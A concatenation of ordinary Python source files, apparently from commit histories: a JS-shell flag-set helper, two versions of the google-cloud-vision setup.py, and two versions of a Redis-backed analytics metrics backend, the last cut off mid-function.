            ['--ion-eager'],
        ]
        if shellSupportsFlag(shellPath, "--no-baseline"):
            basicFlagList.extend([
                ['--no-baseline'],
                ['--no-baseline', '--no-ti'],
            ])
        return basicFlagList
    else:
        sets = [
            # ,m,am,amd,n,mn,amn,amdn,mdn
            [],
            ['-m'],
            ['-m', '-a'],
            ['-m', '-a', '-d']
        ]
        if shellSupportsFlag(shellPath, '-n'):
            sets.extend([
                ['-n'],
                ['-m', '-n'],
                ['-m', '-n', '-a'],
                ['-m', '-n', '-a', '-d'],
                ['-m', '-n', '-d']
            ])
        if shellSupportsFlag(shellPath, "--ion"):
            # Fix: the loop variable previously shadowed the builtin `set`.
            sets += [["--ion"] + flag_set for flag_set in sets]
        return sets
# Consider adding a function (for compareJIT reduction) that takes a flag set
# and returns all its (meaningful) subsets.
def testRandomFlags():
    """Manual smoke test: print 100 random flag sets for the shell at argv[1]."""
    import sys
    for i in range(100):
        print ' '.join(randomFlagSet(sys.argv[1]))

if __name__ == "__main__":
    testRandomFlags()
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import os

from setuptools import find_packages
from setuptools import setup

# Directory holding this setup.py; used to locate README.rst.
PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__))

# The README doubles as the PyPI long description.
with io.open(os.path.join(PACKAGE_ROOT, 'README.rst'), 'r') as readme_file:
    readme = readme_file.read()

REQUIREMENTS = [
    'google-cloud-core >= 0.24.0, < 0.25dev',
]

# enum34 backports the enum module to Python < 3.4.
EXTRAS_REQUIRE = {
    ':python_version<"3.4"': ['enum34'],
}

setup(
    author='Google Cloud Platform',
    author_email='googleapis-packages@google.com',
    name='google-cloud-vision',
    version='0.25.0',
    description='Python Client for Google Cloud Vision',
    long_description=readme,
    # Namespace packages shared with the other google-cloud-* distributions.
    namespace_packages=[
        'google',
        'google.cloud',
        'google.cloud.gapic',
        'google.cloud.gapic.vision',
        'google.cloud.proto',
        'google.cloud.proto.vision',
    ],
    packages=find_packages(exclude=('tests*',)),
    install_requires=REQUIREMENTS,
    extras_require=EXTRAS_REQUIRE,
    url='https://github.com/GoogleCloudPlatform/google-cloud-python',
    license='Apache 2.0',
    platforms='Posix; MacOS X; Windows',
    include_package_data=True,
    zip_safe=False,
    scripts=[],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Topic :: Internet',
    ],
)
Fix deps (#3480)
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Packaging configuration for the ``google-cloud-vision`` client library.
import io
import os
from setuptools import find_packages
from setuptools import setup

PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__))

# The README doubles as the long description shown on PyPI.
with io.open(os.path.join(PACKAGE_ROOT, 'README.rst'), 'r') as readme_file:
    readme = readme_file.read()

# Hard runtime dependencies: core helpers plus the gax / grpc protocol
# packages.
REQUIREMENTS = [
    'google-cloud-core >= 0.24.0, < 0.25dev',
    'google-gax >= 0.15.7, < 0.16dev',
    'googleapis-common-protos[grpc] >= 1.5.2, < 2.0dev',
]

# ``enum`` is stdlib from python 3.4 on; older interpreters get the backport.
EXTRAS_REQUIRE = {
    ':python_version<"3.4"': ['enum34'],
}

setup(
    author='Google Cloud Platform',
    author_email='googleapis-packages@google.com',
    name='google-cloud-vision',
    version='0.25.0',
    description='Python Client for Google Cloud Vision',
    long_description=readme,
    # namespace packages let google.cloud.* distributions share a prefix
    namespace_packages=[
        'google',
        'google.cloud',
        'google.cloud.gapic',
        'google.cloud.gapic.vision',
        'google.cloud.proto',
        'google.cloud.proto.vision',
    ],
    packages=find_packages(exclude=('tests*',)),
    install_requires=REQUIREMENTS,
    extras_require=EXTRAS_REQUIRE,
    url='https://github.com/GoogleCloudPlatform/google-cloud-python',
    license='Apache 2.0',
    platforms='Posix; MacOS X; Windows',
    include_package_data=True,
    zip_safe=False,
    scripts=[],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Topic :: Internet',
    ],
)
|
"""
Copyright 2012 Numan Sachwani <numan@7Geese.com>
This file is provided to you under the Apache License,
Version 2.0 (the "License"); you may not use this file
except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
from analytics.backends.base import BaseAnalyticsBackend
from nydus.db import create_cluster
from dateutil.relativedelta import relativedelta
from dateutil import rrule
import datetime
import itertools
import calendar
import types
class Redis(BaseAnalyticsBackend):
def __init__(self, settings, **kwargs):
    """
    Build a nydus redis cluster from ``settings`` and pass the remaining
    configuration to the base backend.

    :param settings: dict with a required ``hosts`` list and an optional
        ``defaults`` dict of connection parameters.
    :raises Exception: if no redis hosts are configured.
    """
    host_config = settings.get("hosts", [])
    if not host_config:
        raise Exception("No redis hosts specified")
    # nydus wants hosts keyed by an integer index
    indexed_hosts = dict(enumerate(host_config))
    connection_defaults = settings.get(
        "defaults",
        {
            'host': 'localhost',
            'port': 6379,
        })
    self._analytics_backend = create_cluster({
        'engine': 'nydus.db.backends.redis.Redis',
        'router': 'nydus.db.routers.keyvalue.ConsistentHashingRouter',
        'hosts': indexed_hosts,
        'defaults': connection_defaults,
    })
    super(Redis, self).__init__(settings, **kwargs)
def _get_closest_week(self, metric_date):
    """Return the monday that starts the week containing ``metric_date``."""
    # isoweekday() gives monday == 1, so this is the distance back to monday
    offset_from_monday = metric_date.isoweekday() - 1
    return metric_date - datetime.timedelta(days=offset_from_monday)

def _get_daily_metric_key(self, unique_identifier, metric_date):
    """Redis hash key holding a user's daily counters for one month."""
    month_bucket = metric_date.strftime("%y-%m")
    return self._prefix + ":" + "user:%s:analy:%s" % (unique_identifier, month_bucket,)

def _get_weekly_metric_key(self, unique_identifier, metric_date):
    """Redis hash key holding a user's weekly (and monthly) counters for one year."""
    year_bucket = metric_date.strftime("%y")
    return self._prefix + ":" + "user:%s:analy:%s" % (unique_identifier, year_bucket,)

def _get_daily_metric_name(self, metric, metric_date):
    """Hash field name for a single day's counter."""
    return "%s:%s" % (metric, metric_date.strftime("%y-%m-%d"),)

def _get_weekly_metric_name(self, metric, metric_date):
    """Hash field name for one week's counter (``metric_date`` is that week's monday)."""
    return "%s:%s" % (metric, metric_date.strftime("%y-%m-%d"),)

def _get_monthly_metric_name(self, metric, metric_date):
    """Hash field name for one month's counter."""
    return "%s:%s" % (metric, metric_date.strftime("%y-%m"),)
def _get_daily_date_range(self, metric_date, delta):
    """
    Return one date per month touched by the interval
    [``metric_date``, ``metric_date + delta``]. Callers only use the year
    and month of each entry, so the day component is irrelevant.
    """
    end_date = metric_date + delta
    dates = [metric_date]
    cursor = metric_date
    while cursor.month < end_date.month or cursor.year < end_date.year:
        month_length = calendar.monthrange(cursor.year, cursor.month)[1]
        # jump to the 1st of the following month
        cursor = cursor + datetime.timedelta(days=month_length - cursor.day + 1)
        dates.append(cursor)
    return dates

def _get_weekly_date_range(self, metric_date, delta):
    """
    Return one date per calendar year touched by the interval
    [``metric_date``, ``metric_date + delta``] (the yearly hash keys only
    care about the year component).
    """
    last_day = metric_date + delta
    spanning_years = last_day.year - metric_date.year
    return [metric_date] + [
        datetime.date(year=metric_date.year + offset, month=1, day=1)
        for offset in range(1, spanning_years + 1)
    ]
def _parse_and_process_metrics(self, series, list_of_metrics):
    """
    Merge raw ``hmget`` results into a single per-date mapping.

    :param series: list of date objects, one per requested data point
    :param list_of_metrics: list of ``hmget`` result lists (one per scanned
        hash); fields that were never incremented come back as ``None``
    :return: tuple of (set of "YYYY-MM-DD" strings, dict mapping each date
        string to the summed count)
    """
    formatted_result_list = []
    series = [dt.strftime("%Y-%m-%d") for dt in series]
    for result in list_of_metrics:
        values = {}
        for index, date_string in enumerate(series):
            # None means the hash field did not exist -> count of 0
            values[date_string] = int(result[index]) if result[index] is not None else 0
        formatted_result_list.append(values)
    # seed reduce with {} so an empty result list yields an empty dict
    # instead of raising TypeError
    merged_values = reduce(
        lambda a, b: dict((n, a.get(n, 0) + b.get(n, 0)) for n in set(a) | set(b)),
        formatted_result_list, {})
    return set(series), merged_values
def clear_all(self):
    """
    Deletes all ``sandsnake`` related data from redis.
    .. warning::
    Very expensive and destructive operation. Use with caution
    """
    keys = self._analytics_backend.keys()
    # batch every delete into a single pipeline instead of opening a new
    # map() context per key
    with self._analytics_backend.map() as conn:
        for key in itertools.chain(*keys):
            if key.startswith(self._prefix):
                conn.delete(key)
def track_count(self, unique_identifier, metric, inc_amt=1, **kwargs):
    """
    Increment the lifetime counter for ``metric``. Metrics tracked only
    this way cannot be queried by day, week or month.

    :param unique_identifier: unique string identifying the object this metric is for
    :param metric: a unique name for the metric you want to track
    :param inc_amt: the amount to increment the counter by
    :return: ``True`` if successful ``False`` otherwise
    """
    counter_key = self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric)
    return self._analytics_backend.incr(counter_key, inc_amt)
def track_metric(self, unique_identifier, metric, date, inc_amt=1, **kwargs):
    """
    Tracks a metric for a specific ``unique_identifier`` for a certain date. The redis backend supports
    lists for both ``unique_identifier`` and ``metric`` allowing for tracking of multiple metrics for multiple
    unique_identifiers efficiently. Not all backends may support this.
    TODO: Possibly default date to the current date.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track. This can be a list or a string.
    :param date: A python date object indicating when this event occurred
    :param inc_amt: The amount you want to increment the ``metric`` for the ``unique_identifier``
    :return: ``True`` if successful ``False`` otherwise
    """
    # normalize both arguments to sequences so single values and lists share
    # one code path (``basestring`` / ``types.ListType`` are python 2 only)
    metric = [metric] if isinstance(metric, basestring) else metric
    unique_identifier = [unique_identifier] if not isinstance(unique_identifier, (types.ListType, types.TupleType, types.GeneratorType,)) else unique_identifier
    results = []
    with self._analytics_backend.map() as conn:
        for uid in unique_identifier:
            hash_key_daily = self._get_daily_metric_key(uid, date)
            closest_monday = self._get_closest_week(date)
            hash_key_weekly = self._get_weekly_metric_key(uid, date)
            for single_metric in metric:
                daily_metric_name = self._get_daily_metric_name(single_metric, date)
                weekly_metric_name = self._get_weekly_metric_name(single_metric, closest_monday)
                monthly_metric_name = self._get_monthly_metric_name(single_metric, date)
                results.append(
                    [
                        conn.hincrby(hash_key_daily, daily_metric_name, inc_amt),
                        # weekly and monthly counters share the per-year hash key
                        conn.hincrby(hash_key_weekly, weekly_metric_name, inc_amt),
                        conn.hincrby(hash_key_weekly, monthly_metric_name, inc_amt),
                        conn.incr(self._prefix + ":" + "analy:%s:count:%s" % (uid, single_metric), inc_amt)
                    ]
                )
    return results
def get_metric_by_day(self, unique_identifier, metric, from_date, limit=30, **kwargs):
    """
    Return ``limit`` daily data points for ``metric`` starting at
    ``from_date``.

    :param unique_identifier: unique string identifying the object this metric is for
    :param metric: a unique name for the metric you want to track
    :param from_date: a python date object
    :param limit: the total number of days to retrieve starting from ``from_date``
    """
    pipeline = kwargs.get("connection", None)
    # one entry per requested day
    series = [from_date + datetime.timedelta(days=offset) for offset in range(limit)]
    key_dates = self._get_daily_date_range(from_date, datetime.timedelta(days=limit))
    field_names = [self._get_daily_metric_name(metric, day) for day in series]

    def run(conn):
        # one hmget per monthly hash the day range touches
        return [conn.hmget(self._get_daily_metric_key(unique_identifier, key_date), field_names)
                for key_date in key_dates]

    if pipeline is not None:
        # caller supplied an open pipeline: let it batch the commands
        results = run(pipeline)
    else:
        with self._analytics_backend.map() as conn:
            results = run(conn)
    return self._parse_and_process_metrics(series, results)
def get_metric_by_week(self, unique_identifier, metric, from_date, limit=10, **kwargs):
    """
    Returns the ``metric`` for ``unique_identifier`` segmented by week
    starting from ``from_date``.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param from_date: A python date object
    :param limit: The total number of weeks to retrieve starting from ``from_date``
    :param connection: (optional, via kwargs) an already-open pipeline to reuse
    """
    conn = kwargs.get("connection", None)
    # weekly buckets are anchored on the monday starting each week
    closest_monday_from_date = self._get_closest_week(from_date)
    metric_key_date_range = self._get_weekly_date_range(closest_monday_from_date, datetime.timedelta(weeks=limit))
    date_generator = (closest_monday_from_date + datetime.timedelta(days=i) for i in itertools.count(step=7))
    #generate a list of mondays in between the start date and the end date
    series = list(itertools.islice(date_generator, limit))
    metric_keys = [self._get_weekly_metric_name(metric, monday_date) for monday_date in series]
    # one hmget per yearly hash the week range touches
    metric_func = lambda conn: [conn.hmget(self._get_weekly_metric_key(unique_identifier, \
        metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
    if conn is not None:
        results = metric_func(conn)
    else:
        with self._analytics_backend.map() as conn:
            results = metric_func(conn)
    series, results = self._parse_and_process_metrics(series, results)
    return series, results
def get_metric_by_month(self, unique_identifier, metric, from_date, limit=10, **kwargs):
    """
    Returns the ``metric`` for ``unique_identifier`` segmented by month
    starting from ``from_date``. It will retrieve metrics data starting from the 1st of the
    month specified in ``from_date``
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param from_date: A python date object
    :param limit: The total number of months to retrieve starting from ``from_date``
    :param connection: (optional, via kwargs) an already-open pipeline to reuse
    """
    conn = kwargs.get("connection", None)
    first_of_month = datetime.date(year=from_date.year, month=from_date.month, day=1)
    # monthly counters live in the same per-year hashes as the weekly ones
    metric_key_date_range = self._get_weekly_date_range(
        first_of_month, relativedelta(months=limit))
    date_generator = (first_of_month + relativedelta(months=i) for i in itertools.count())
    #generate a list of first-of-month dates in between the start date and the end date
    series = list(itertools.islice(date_generator, limit))
    metric_keys = [self._get_monthly_metric_name(metric, month_date) for month_date in series]
    metric_func = lambda conn: [conn.hmget(
        self._get_weekly_metric_key(
            unique_identifier, metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
    if conn is not None:
        results = metric_func(conn)
    else:
        with self._analytics_backend.map() as conn:
            results = metric_func(conn)
    series, results = self._parse_and_process_metrics(series, results)
    return series, results
def get_metrics(self, metric_identifiers, from_date, limit=10, group_by="week", **kwargs):
    """
    Retrieves multiple metrics as efficiently as possible.
    :param metric_identifiers: a list of tuples of the form ``(unique_identifier, metric_name)`` identifying which metrics to retrieve.
    For example [('user:1', 'people_invited',), ('user:2', 'people_invited',), ('user:1', 'comments_posted',), ('user:2', 'comments_posted',)]
    :param from_date: A python date object
    :param limit: The total number of data points to retrieve starting from ``from_date``
    :param group_by: The type of aggregation to perform on the metric. Choices are: ``day``, ``week`` or ``month``
    """
    results = []
    #validation of types:
    allowed_types = {
        "day": self.get_metric_by_day,
        "week": self.get_metric_by_week,
        "month": self.get_metric_by_month,
    }
    if group_by.lower() not in allowed_types:
        raise Exception("Allowed values for group_by are day, week or month.")
    group_by_func = allowed_types[group_by.lower()]
    #pass a connection object so we can pipeline as much as possible
    with self._analytics_backend.map() as conn:
        for unique_identifier, metric in metric_identifiers:
            results.append(group_by_func(unique_identifier, metric, from_date, limit=limit, connection=conn))
    #we have to merge all the metric results afterwards because we are using a custom context processor
    # NOTE(review): results gathered inside the pipeline appear to need
    # re-parsing once the ``with`` block has executed — confirm against nydus
    return [
        self._parse_and_process_metrics(series, list_of_metrics) for
        series, list_of_metrics in results]
def get_count(self, unique_identifier, metric, start_date=None, end_date=None, **kwargs):
    """
    Gets the count for the ``metric`` for ``unique_identifier``. You can specify a ``start_date``
    and an ``end_date``, to only get metrics within that time range.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param start_date: Get the specified metrics after this date
    :param end_date: Get the specified metrics before this date
    :return: The count for the metric, 0 otherwise
    """
    result = None
    if start_date and end_date:
        # normalize: ensure start <= end, then promote plain dates to datetimes
        start_date, end_date = (start_date, end_date,) if start_date < end_date else (end_date, start_date,)
        start_date = start_date if hasattr(start_date, 'date') else datetime.datetime.combine(start_date, datetime.time())
        end_date = end_date if hasattr(end_date, 'date') else datetime.datetime.combine(end_date, datetime.time())
        # every 1st-of-month between the two endpoints
        monthly_metrics_dates = list(rrule.rrule(rrule.MONTHLY, dtstart=start_date, bymonthday=1, until=end_date))
        #We can sorta optimize this by getting most of the data by month
        if len(monthly_metrics_dates) >= 3:
            # split into: partial leading days + whole months + partial trailing days
            start_diff = monthly_metrics_dates[0] - start_date
            end_diff = end_date - monthly_metrics_dates[-1]
            with self._analytics_backend.map() as conn:
                monthly_metric_series, monthly_metric_results = self.get_metric_by_month(unique_identifier, metric, monthly_metrics_dates[0], limit=len(monthly_metrics_dates) - 1, connection=conn)
                #get the difference from the date to the start date and get all dates in between
                starting_metric_series, starting_metric_results = self.get_metric_by_day(unique_identifier, metric, start_date, limit=start_diff.days, connection=conn) if start_diff.days > 0 else ([], [[]],)
                ending_metric_series, ending_metric_results = self.get_metric_by_day(unique_identifier, metric, monthly_metrics_dates[-1], limit=end_diff.days + 1, connection=conn)
            # NOTE(review): re-parsed after the ``with`` block, presumably
            # because the pipelined values resolve on exit — confirm
            monthly_metric_series, monthly_metric_results = self._parse_and_process_metrics(monthly_metric_series, monthly_metric_results)
            starting_metric_series, starting_metric_results = self._parse_and_process_metrics(starting_metric_series, starting_metric_results)
            ending_metric_series, ending_metric_results = self._parse_and_process_metrics(ending_metric_series, ending_metric_results)
            result = sum(monthly_metric_results.values()) + sum(starting_metric_results.values()) + sum(ending_metric_results.values())
        else:
            # short range: just sum the daily counters directly
            diff = end_date - start_date
            metric_results = self.get_metric_by_day(unique_identifier, metric, start_date, limit=diff.days + 1)
            result = sum(metric_results[1].values())
    else:
        # no range given: read the lifetime counter
        try:
            result = int(self._analytics_backend.get(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric,)))
        except TypeError:
            # missing key -> redis returned None
            result = 0
    return result
def get_counts(self, metric_identifiers, **kwargs):
    """
    Retrieve several lifetime counters as efficiently as possible.

    :param metric_identifiers: a list of ``(unique_identifier, metric_name)``
        tuples identifying which counters to fetch, e.g.
        [('user:1', 'people_invited',), ('user:2', 'people_invited',)]
    """
    # batch all GETs through one pipeline
    with self._analytics_backend.map() as conn:
        raw_counts = [
            conn.get(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric,)) for
            unique_identifier, metric in metric_identifiers]
    parsed_results = []
    for raw_count in raw_counts:
        # missing keys come back as None -> treat as 0
        try:
            parsed_results.append(int(raw_count))
        except TypeError:
            parsed_results.append(0)
    return parsed_results
Finish initial implementation of sync and set.
"""
Copyright 2012 Numan Sachwani <numan@7Geese.com>
This file is provided to you under the Apache License,
Version 2.0 (the "License"); you may not use this file
except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
from analytics.backends.base import BaseAnalyticsBackend
from nydus.db import create_cluster
from calendar import monthrange
from dateutil.relativedelta import relativedelta
from dateutil import rrule
import datetime
import itertools
import calendar
import types
class Redis(BaseAnalyticsBackend):
def __init__(self, settings, **kwargs):
    """
    Create a nydus redis cluster from ``settings`` and pass the remaining
    configuration to the base backend.

    :param settings: dict containing a required ``hosts`` list and an
        optional ``defaults`` dict of connection parameters.
    :raises Exception: if no redis hosts are configured.
    """
    nydus_hosts = {}
    hosts = settings.get("hosts", [])
    if not hosts:
        raise Exception("No redis hosts specified")
    # nydus expects hosts keyed by an integer index
    for i, host in enumerate(hosts):
        nydus_hosts[i] = host
    defaults = settings.get(
        "defaults",
        {
            'host': 'localhost',
            'port': 6379,
        })
    self._analytics_backend = create_cluster({
        'engine': 'nydus.db.backends.redis.Redis',
        'router': 'nydus.db.routers.keyvalue.ConsistentHashingRouter',
        'hosts': nydus_hosts,
        'defaults': defaults,
    })
    super(Redis, self).__init__(settings, **kwargs)
def _get_closest_week(self, metric_date):
    """Return the monday on or before ``metric_date``."""
    # isoweekday(): monday == 1 .. sunday == 7
    return metric_date - datetime.timedelta(days=metric_date.isoweekday() - 1)

def _get_daily_metric_key(self, unique_identifier, metric_date):
    """Redis hash key for a user's daily counters (one hash per month)."""
    return self._prefix + ":" + "user:%s:analy:%s" % (unique_identifier, metric_date.strftime("%y-%m"),)

def _get_weekly_metric_key(self, unique_identifier, metric_date):
    """Redis hash key for a user's weekly and monthly counters (one hash per year)."""
    return self._prefix + ":" + "user:%s:analy:%s" % (unique_identifier, metric_date.strftime("%y"),)

def _get_daily_metric_name(self, metric, metric_date):
    """Hash field name for a single day's counter."""
    day_bucket = metric_date.strftime("%y-%m-%d")
    return "%s:%s" % (metric, day_bucket,)

def _get_weekly_metric_name(self, metric, metric_date):
    """Hash field name for a week's counter; ``metric_date`` is the week's monday."""
    week_bucket = metric_date.strftime("%y-%m-%d")
    return "%s:%s" % (metric, week_bucket,)

def _get_monthly_metric_name(self, metric, metric_date):
    """Hash field name for a month's counter."""
    month_bucket = metric_date.strftime("%y-%m")
    return "%s:%s" % (metric, month_bucket,)
def _get_daily_date_range(self, metric_date, delta):
    """
    Get the range of months that we need to use as keys to scan redis.
    Returns one date per month in [``metric_date``, ``metric_date + delta``];
    callers only use the year/month of each entry.
    """
    dates = [metric_date]
    start_date = metric_date
    end_date = metric_date + delta
    while start_date.month < end_date.month or start_date.year < end_date.year:
        days_in_month = calendar.monthrange(start_date.year, start_date.month)[1]
        #shift along to the next month as one of the months we will have to see. We don't care that the exact date
        #is the 1st in each subsequent date range as we only care about the year and the month
        start_date = start_date + datetime.timedelta(days=days_in_month - start_date.day + 1)
        dates.append(start_date)
    return dates

def _get_weekly_date_range(self, metric_date, delta):
    """
    Gets the range of years that we need to use as keys to get metrics from redis.
    Returns one date per calendar year in [``metric_date``, ``metric_date + delta``].
    """
    dates = [metric_date]
    end_date = metric_date + delta
    #Figure out how many years our metric range spans
    spanning_years = end_date.year - metric_date.year
    for i in range(spanning_years):
        #for the weekly keys, we only care about the year
        dates.append(
            datetime.date(
                year=metric_date.year + (i + 1), month=1, day=1))
    return dates
def _parse_and_process_metrics(self, series, list_of_metrics):
    """
    Merge the raw ``hmget`` results into one mapping of date -> count.

    :param series: list of date objects, one per data point requested
    :param list_of_metrics: list of ``hmget`` results (one list per hash
        scanned); redis returns ``None`` for fields that never existed
    :return: tuple of (set of "YYYY-MM-DD" strings, dict of date string
        to summed count)
    """
    formatted_result_list = []
    series = [dt.strftime("%Y-%m-%d") for dt in series]
    for result in list_of_metrics:
        values = {}
        for index, date_string in enumerate(series):
            # None -> the counter was never incremented for that bucket
            values[date_string] = int(result[index]) if result[index] is not None else 0
        formatted_result_list.append(values)
    # pass {} as the initializer so an empty ``list_of_metrics`` produces
    # an empty dict rather than a TypeError from reduce()
    merged_values = reduce(
        lambda a, b: dict((n, a.get(n, 0) + b.get(n, 0)) for n in set(a) | set(b)),
        formatted_result_list, {})
    return set(series), merged_values
def _num_weeks(self, start_date, end_date):
    """
    Number of weekly buckets needed to cover ``start_date``..``end_date``,
    counting from the monday on or before ``start_date``.
    """
    closest_monday = self._get_closest_week(start_date)
    # floor division keeps the result an int on python 2 and python 3 alike
    return ((end_date - closest_monday).days // 7) + 1
def _num_months(self, start_date, end_date):
    """Number of calendar months touched by ``start_date``..``end_date``, inclusive."""
    year_span = (end_date.year - start_date.year) * 12
    return year_span + (end_date.month - start_date.month) + 1
def clear_all(self):
    """
    Deletes all ``sandsnake`` related data from redis.
    .. warning::
    Very expensive and destructive operation. Use with caution
    """
    keys = self._analytics_backend.keys()
    # pipeline all the deletes at once rather than entering a new map()
    # context for every single key
    with self._analytics_backend.map() as conn:
        for key in itertools.chain(*keys):
            if key.startswith(self._prefix):
                conn.delete(key)
def track_count(self, unique_identifier, metric, inc_amt=1, **kwargs):
    """
    Tracks a metric just by count. If you track a metric this way, you won't be able
    to query the metric by day, week or month.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param inc_amt: The amount you want to increment the ``metric`` for the ``unique_identifier``
    :return: ``True`` if successful ``False`` otherwise
    """
    # single INCR on the lifetime counter key
    return self._analytics_backend.incr(self._prefix + ":" + "analy:%s:count:%s" % (unique_identifier, metric), inc_amt)
def track_metric(self, unique_identifier, metric, date, inc_amt=1, **kwargs):
    """
    Tracks a metric for a specific ``unique_identifier`` for a certain date. The redis backend supports
    lists for both ``unique_identifier`` and ``metric`` allowing for tracking of multiple metrics for multiple
    unique_identifiers efficiently. Not all backends may support this.
    TODO: Possibly default date to the current date.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track. This can be a list or a string.
    :param date: A python date object indicating when this event occurred
    :param inc_amt: The amount you want to increment the ``metric`` for the ``unique_identifier``
    :return: ``True`` if successful ``False`` otherwise
    """
    # coerce both arguments to sequences so scalars and lists share one
    # code path (``basestring`` / ``types.ListType`` are python 2 only)
    metric = [metric] if isinstance(metric, basestring) else metric
    unique_identifier = [unique_identifier] if not isinstance(unique_identifier, (types.ListType, types.TupleType, types.GeneratorType,)) else unique_identifier
    results = []
    with self._analytics_backend.map() as conn:
        for uid in unique_identifier:
            hash_key_daily = self._get_daily_metric_key(uid, date)
            closest_monday = self._get_closest_week(date)
            hash_key_weekly = self._get_weekly_metric_key(uid, date)
            for single_metric in metric:
                daily_metric_name = self._get_daily_metric_name(single_metric, date)
                weekly_metric_name = self._get_weekly_metric_name(single_metric, closest_monday)
                monthly_metric_name = self._get_monthly_metric_name(single_metric, date)
                results.append(
                    [
                        conn.hincrby(hash_key_daily, daily_metric_name, inc_amt),
                        # the per-year hash stores both weekly and monthly fields
                        conn.hincrby(hash_key_weekly, weekly_metric_name, inc_amt),
                        conn.hincrby(hash_key_weekly, monthly_metric_name, inc_amt),
                        conn.incr(self._prefix + ":" + "analy:%s:count:%s" % (uid, single_metric), inc_amt)
                    ]
                )
    return results
def get_metric_by_day(self, unique_identifier, metric, from_date, limit=30, **kwargs):
    """
    Returns the ``metric`` for ``unique_identifier`` segmented by day
    starting from ``from_date``.
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param from_date: A python date object
    :param limit: The total number of days to retrieve starting from ``from_date``
    :param connection: (optional, via kwargs) an already-open pipeline to reuse
    """
    conn = kwargs.get("connection", None)
    date_generator = (from_date + datetime.timedelta(days=i) for i in itertools.count())
    # monthly hash keys the requested day range touches
    metric_key_date_range = self._get_daily_date_range(from_date, datetime.timedelta(days=limit))
    #generate a list of days in between the start date and the end date
    series = list(itertools.islice(date_generator, limit))
    metric_keys = [self._get_daily_metric_name(metric, daily_date) for daily_date in series]
    # one hmget per monthly hash; missing fields come back as None
    metric_func = lambda conn: [conn.hmget(self._get_daily_metric_key(unique_identifier, \
        metric_key_date), metric_keys) for metric_key_date in metric_key_date_range]
    if conn is not None:
        results = metric_func(conn)
    else:
        with self._analytics_backend.map() as conn:
            results = metric_func(conn)
    series, results = self._parse_and_process_metrics(series, results)
    return series, results
def get_metric_by_week(self, unique_identifier, metric, from_date, limit=10, **kwargs):
    """
    Return ``limit`` weekly data points for ``metric`` starting with the
    week that contains ``from_date``.

    :param unique_identifier: unique string identifying the object this metric is for
    :param metric: a unique name for the metric you want to track
    :param from_date: a python date object
    :param limit: the total number of weeks to retrieve starting from ``from_date``
    """
    pipeline = kwargs.get("connection", None)
    # weekly buckets are anchored on mondays
    first_monday = self._get_closest_week(from_date)
    key_dates = self._get_weekly_date_range(first_monday, datetime.timedelta(weeks=limit))
    series = [first_monday + datetime.timedelta(days=7 * week) for week in range(limit)]
    field_names = [self._get_weekly_metric_name(metric, monday) for monday in series]

    def run(conn):
        # one hmget per yearly hash the range touches
        return [conn.hmget(self._get_weekly_metric_key(unique_identifier, key_date), field_names)
                for key_date in key_dates]

    if pipeline is not None:
        # caller supplied an open pipeline: let it batch the commands
        results = run(pipeline)
    else:
        with self._analytics_backend.map() as conn:
            results = run(conn)
    return self._parse_and_process_metrics(series, results)
def get_metric_by_month(self, unique_identifier, metric, from_date, limit=10, **kwargs):
    """
    Returns the ``metric`` for ``unique_identifier`` segmented by month
    starting from ``from_date``. It will retrieve metrics data starting from the 1st of the
    month specified in ``from_date``
    :param unique_identifier: Unique string identifying the object this metric is for
    :param metric: A unique name for the metric you want to track
    :param from_date: A python date object
    :param limit: The total number of months to retrieve starting from ``from_date``
    :param connection: (optional, via kwargs) an already-open pipeline to reuse
